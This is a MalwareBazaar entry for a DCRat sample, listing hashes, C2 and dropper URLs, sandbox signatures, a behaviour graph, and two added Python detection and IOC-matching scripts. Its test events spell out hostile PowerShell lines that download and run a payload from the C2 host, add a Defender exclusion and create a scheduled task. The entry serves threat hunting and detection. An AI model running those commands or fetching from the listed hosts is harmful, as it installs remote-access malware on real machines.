MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 786cd9f43e76702fd26319d85239b17c6acf79e5afda1a3ab82d95e46bbceff7. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

DCRat
Vendor detections: 10


SHA256 hash: 786cd9f43e76702fd26319d85239b17c6acf79e5afda1a3ab82d95e46bbceff7
SHA3-384 hash: adeb357f119590bcef49c2733b6953ef92594e880f2e0f64039e03996926581c4c38c07e2666216dec4562097d835301
SHA1 hash: 2d41cae4788f5c860af7a039a084d4b960eca14c
MD5 hash: 560cd8701722062e9eca6e7bebfa4272
humanhash: cup-summer-juliet-comet
File name: 786CD9F43E76702FD26319D85239B17C6ACF79E5AFDA1.exe
Download: download sample
Signature: DCRat
File size: 13'824 bytes
First seen: 2021-11-10 01:00:59 UTC
Last seen: Never
File type: Executable exe
MIME type: application/x-dosexec
imphash: a5f2aefc58375ca77caff4230aecbe91 (1 x DCRat)
ssdeep: 192:v0M9ln+QAd+b9mVPUqPXcEVmFWD+w8qcv0uQ25TwGzBtgeEgr+kHaY:v0iln+nd+pSPc6n8qcvNzTTzBWYr3aY
TLSH: T179523E552789BB05C03EDEF21313F5B866B62C351A939098B96D0F3D8D7AAE58F1430B
Reporter: abuse_ch
Tags: DCRat exe


abuse_ch
DCRat C2:
http://82.146.56.118/output/_cached/geobigload.php

Indicators Of Compromise (IOCs)


Below is a list of indicators of compromise (IOCs) associated with this malware sample.

IOC: http://82.146.56.118/output/_cached/geobigload.php
ThreatFox reference: https://threatfox.abuse.ch/ioc/246304/

Intelligence


File Origin
Uploads: 1
Downloads: 133
Origin country: n/a
Vendor Threat Intelligence

Result
Verdict: MALICIOUS
Details: Windows PE Executable
Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary is suspicious or malicious.
Malware family: Generic Malware
Verdict: Malicious

Result
Threat name: BitCoin Miner DCRat
Detection: malicious
Classification: troj.evad.mine
Score: 100 / 100
Signature
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Powershell drops PE file
Sigma detected: Powershell Defender Exclusion
Sigma detected: Powershell download and execute file
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Script Execution From Temp Folder
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses schtasks.exe or at.exe to add and modify task schedules
Wscript starts Powershell (via cmd or directly)
Yara detected BitCoin Miner
Yara detected DCRat
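Most of the signatures in the list above (a Defender exclusion added from PowerShell, PowerShell DownloadFile, script execution from a Temp folder, schtasks-based persistence, wscript spawning PowerShell, process creation via WMI) describe conditions on process-creation telemetry, so they can be re-checked in your own EDR or Sysmon data. The Python below is an added example, not the sandbox's or Sigma's rule code: it approximates those conditions as rules over Sysmon-style process events. The event records and command lines are constructed for illustration and are not taken from this sample; the task name, file names and paths in them are assumptions.

```python
"""Approximate the process-level signatures listed on this entry as rules over
Sysmon-style process-creation events.

Added example: these are not the sandbox's or Sigma's rule implementations,
only close approximations of the conditions the signature names describe.
The events below are constructed; the command lines are not from this sample.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str            # full path or basename of the new process (Sysmon "Image")
    command_line: str     # Sysmon "CommandLine"
    parent_image: str = ""  # Sysmon "ParentImage"


POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = POWERSHELL | {"wscript.exe", "cscript.exe", "cmd.exe", "mshta.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _has(pattern: str, text: str) -> bool:
    return re.search(pattern, text, re.IGNORECASE) is not None


RULES = [
    # "Powershell Defender Exclusion": Add-/Set-MpPreference with an -Exclusion* switch.
    ("Powershell Defender Exclusion",
     lambda e: _has(r"(add|set)-mppreference", e.command_line)
               and _has(r"-exclusion(path|extension|process)", e.command_line)),
    # "PowerShell DownloadFile": WebClient download primitives on a PowerShell command line.
    ("PowerShell DownloadFile",
     lambda e: basename(e.image) in POWERSHELL
               and _has(r"\.download(file|string|data)\s*\(", e.command_line)),
    # "Suspicious Script Execution From Temp Folder": a script host given a \Temp\ or \Tmp\ path.
    ("Suspicious Script Execution From Temp Folder",
     lambda e: basename(e.image) in SCRIPT_HOSTS and _has(r"\\(temp|tmp)\\", e.command_line)),
    ("Uses schtasks.exe or at.exe to add and modify task schedules",
     lambda e: basename(e.image) in {"schtasks.exe", "at.exe"}
               and _has(r"/(create|change)\b", e.command_line)),
    # Direct wscript -> powershell, or wscript -> cmd with powershell on the cmd line.
    ("Wscript starts Powershell (via cmd or directly)",
     lambda e: basename(e.parent_image) in {"wscript.exe", "cscript.exe"}
               and (basename(e.image) in POWERSHELL
                    or (basename(e.image) == "cmd.exe" and "powershell" in e.command_line.lower()))),
    ("Creates processes via WMI",
     lambda e: basename(e.parent_image) == "wmiprvse.exe"),
]


def detect(events):
    """Return (event index, rule name) for every rule that fires on each event."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES if rule(ev)]


# Constructed events modelled on the chains in the behaviour graph
# (sample -> cmd -> powershell -> dropped EXE; wscript -> cmd -> powershell).
# Task name, file names and paths are assumptions, not values observed in this sample.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c powershell -nop -w hidden Add-MpPreference -ExclusionPath "C:\Windows\System32"',
              r"C:\Users\user\Desktop\786CD9F43E76702FD26319D85239B17C6ACF79E5AFDA1.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -nop -w hidden -c (New-Object System.Net.WebClient).DownloadFile('http://82.146.56.118/output/_cached/EternalphpsecureProcessapi/b09851803105e3256d3d7ea4d4294cf1cdadcfaf.bin','C:\Users\user\AppData\Local\Temp\stage.exe'); Start-Process 'C:\Users\user\AppData\Local\Temp\stage.exe'",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /f /sc minute /mo 1 /tn services32 /tr "C:\Windows\System32\services32.exe"',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c powershell -w hidden -File C:\savesHostNet\stage2.ps1",
              r"C:\Windows\System32\wscript.exe"),
    ProcEvent(r"C:\Windows\System32\notepad.exe", "notepad.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command Get-MpPreference", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for idx, rule_name in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule_name}")
```

The rules deliberately key on the command line rather than on the image alone, because the graph shows the same behaviour reached through different parents (the sample, services32.exe, sihost32.exe and a wscript-launched cmd.exe all add Defender exclusions). The two benign events at the end show that Get-MpPreference and an ordinary interactive PowerShell do not trip the exclusion rule.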
Behaviour
Behavior Graph (ID 518848; sample 786CD9F43E76702FD26319D8523...; start date 10/11/2021; architecture WINDOWS; score 100), flattened from the rendered graph into a process tree. Signatures are given in square brackets on the node that raised them; dropped files and network contacts are listed under the node that produced them.

Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 11 other signatures.

786CD9F43E76702FD26319D85239B17C6ACF79E5AFDA1.exe  [Adds a directory exclusion to Windows Defender]
  cmd.exe  [Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Tries to download and execute files (via powershell)]
    powershell.exe
      EO2.exe  [Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures]
        dropped: C:\Windows\System32\services32.exe (PE32+); C:\Windows\System32\...\sihost32.exe (PE32+)
        sihost32.exe  [Multi AV Scanner detection for dropped file; Adds a directory exclusion to Windows Defender]
          cmd.exe  [Wscript starts Powershell (via cmd or directly); Adds a directory exclusion to Windows Defender]
            conhost.exe; powershell.exe; 3 other processes
        services32.exe
          network: github.com 140.82.121.4, ports 443, 49774 (GITHUBUS, United States); raw.githubusercontent.com 185.199.110.133, ports 443, 49775 (FASTLYUS, Netherlands); sanctam.net
          cmd.exe
            conhost.exe; powershell.exe; 3 other processes
          cmd.exe
            2 other processes
        cmd.exe  [Uses schtasks.exe or at.exe to add and modify task schedules]
          conhost.exe; powershell.exe; 3 other processes
        cmd.exe
          conhost.exe; schtasks.exe
    powershell.exe
      EO3.exe
        dropped: C:\...\savesHostNetwinPerfcommon.exe (PE32); C:\savesHostNet\noNjApR3JG8.bat (ASCII)
        wscript.exe  [Wscript starts Powershell (via cmd or directly)]
          cmd.exe
            savesHostNetwinPerfcommon.exe  [Multi AV Scanner detection for dropped file; Creates autostart registry keys with suspicious values (likely registry only malware); Creates multiple autostart registry keys; 2 other signatures]
              dropped: C:\Windows\SystemApps\...\SearchUI.exe (PE32); C:\Windows\System32\...\powershell.exe (PE32); C:\Program Files\...\kvrVvxXgHhhXykIpPMRj.exe (PE32)
            conhost.exe
    powershell.exe
      EO1.exe
    6 other processes  [Powershell drops PE file]
      network: 82.146.56.118, ports 49745, 49752, 49759 (THEFIRST-ASRU, Russian Federation)
      dropped: C:\Users\user\AppData\Local\TempO3.exe (PE32); C:\Users\user\AppData\Local\TempO2.exe (PE32+); C:\Users\user\AppData\Local\TempO1.exe (PE32)

services32.exe (second root process)  [Multi AV Scanner detection for dropped file]
  cmd.exe  [Adds a directory exclusion to Windows Defender]
    powershell.exe
      network: 192.168.2.1 (unknown)
    conhost.exe; 2 other processes
  cmd.exe
    conhost.exe; schtasks.exe

powershell.exe (third root process)
5 other root processes
Threat name: Win32.Trojan.Tiny
Status: Malicious
First seen: 2021-11-06 17:48:51 UTC
AV detection: 21 of 28 (75.00%)
Threat level: 5/5
Verdict: malicious

Result
Malware family:
Score: 10/10
Tags: family:dcrat infostealer persistence rat spyware stealer suricata
Behaviour
Creates scheduled task(s)
Modifies registry class
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Drops file in Program Files directory
Drops file in System32 directory
Adds Run key to start application
Loads dropped DLL
Reads user/profile data of web browsers
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
DCRat Payload
DcRat
Process spawned unexpected child process
suricata: ET MALWARE DCRAT Activity (GET)
Malware Config
Dropper Extraction:
http://82.146.56.118/output/_cached/EternalphpsecureProcessapi/b09851803105e3256d3d7ea4d4294cf1cdadcfaf.bin
http://82.146.56.118/output/_cached/EternalphpsecureProcessapi/60aafbb767c19b91d8dff49c5185de5ba687a116.bin
http://82.146.56.118/output/_cached/EternalphpsecureProcessapi/1574bddb75c78a6fd2251d61e2993b5146201319.bin
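The C2 URL in the IOC section above (ThreatFox reference 246304) and the three dropper URLs under Dropper Extraction all sit on the same host, 82.146.56.118, so a hunt over web proxy logs should flag the exact URLs and, more weakly, any other contact with that host. The Python below is an added example, not MalwareBazaar or ThreatFox code, that does this matching. The indicator values are the ones shown on this entry; the log format (timestamp, client IP, method, URL, status) and every log line are constructed for illustration and are not real traffic.

```python
"""Match the indicators listed on this MalwareBazaar entry against web proxy logs.

Added example: the indicator values are taken from the entry; the log format and
the log lines below are constructed for illustration and are not from any real
infection.
"""
from urllib.parse import urlsplit

# C2 URL reported by abuse_ch (ThreatFox IOC 246304).
C2_URLS = {
    "http://82.146.56.118/output/_cached/geobigload.php",
}
# Dropper URLs from the "Malware Config / Dropper Extraction" section.
DROPPER_URLS = {
    "http://82.146.56.118/output/_cached/EternalphpsecureProcessapi/b09851803105e3256d3d7ea4d4294cf1cdadcfaf.bin",
    "http://82.146.56.118/output/_cached/EternalphpsecureProcessapi/60aafbb767c19b91d8dff49c5185de5ba687a116.bin",
    "http://82.146.56.118/output/_cached/EternalphpsecureProcessapi/1574bddb75c78a6fd2251d61e2993b5146201319.bin",
}


def normalize(url: str):
    """Reduce a URL to (scheme, host[:port], path) so that host case, an explicit
    default port and a query string do not defeat the match. The path stays
    case-sensitive because the server's paths are."""
    p = urlsplit(url.strip())
    scheme = p.scheme.lower()
    host = (p.hostname or "").lower()
    default = {"http": 80, "https": 443}.get(scheme)
    if p.port is not None and p.port != default:
        host = f"{host}:{p.port}"
    return scheme, host, p.path or "/"


# Exact-URL index plus the set of hosts, so a request for a new path on the same
# server is still surfaced (as a weaker, host-only match).
INDEX = {normalize(u): "c2" for u in C2_URLS}
INDEX.update({normalize(u): "dropper" for u in DROPPER_URLS})
HOSTS = {host for (_, host, _) in INDEX}


def classify(url: str):
    """Return "c2", "dropper", "host-only" or None for one requested URL."""
    key = normalize(url)
    if key in INDEX:
        return INDEX[key]
    if key[1] in HOSTS:
        return "host-only"
    return None


def scan_proxy_log(lines):
    """Return one hit per matching request. Constructed log format:
    <timestamp> <client-ip> <method> <url> <status>"""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) != 5:
            continue  # skip malformed lines rather than abort the hunt
        ts, client, method, url, status = fields
        verdict = classify(url)
        if verdict:
            hits.append({"ts": ts, "client": client, "method": method,
                         "url": url, "status": status, "match": verdict})
    return hits


# Constructed log lines (not real traffic): the exact C2 URL, a dropper fetch with
# an explicit :80, a benign GitHub fetch, a POST to the C2 path with a query string,
# an unknown path on the C2 host, and an unrelated site.
SAMPLE_LOG = [
    "2021-11-10T01:03:12Z 10.0.0.25 GET http://82.146.56.118/output/_cached/geobigload.php 200",
    "2021-11-10T01:03:14Z 10.0.0.25 GET http://82.146.56.118:80/output/_cached/EternalphpsecureProcessapi/b09851803105e3256d3d7ea4d4294cf1cdadcfaf.bin 200",
    "2021-11-10T01:03:20Z 10.0.0.25 GET https://raw.githubusercontent.com/example/repo/main/README.md 200",
    "2021-11-10T01:04:01Z 10.0.0.31 POST http://82.146.56.118/output/_cached/geobigload.php?id=1 200",
    "2021-11-10T01:05:00Z 10.0.0.40 GET http://82.146.56.118/some/other/path 404",
    "2021-11-10T01:06:00Z 10.0.0.25 GET http://example.com/ 200",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["client"]} {hit["match"]:<9} {hit["method"]} {hit["url"]}')
```

The github.com and raw.githubusercontent.com contacts in the behaviour graph are deliberately not in the indicator set: they are shared infrastructure, and flagging them would drown the hunt in benign hits. The host-only match exists so that a later campaign using a new path on 82.146.56.118 still surfaces, at a lower confidence than an exact URL hit.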
Unpacked files
SHA256 hash: 786cd9f43e76702fd26319d85239b17c6acf79e5afda1a3ab82d95e46bbceff7
MD5 hash: 560cd8701722062e9eca6e7bebfa4272
SHA1 hash: 2d41cae4788f5c860af7a039a084d4b960eca14c
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments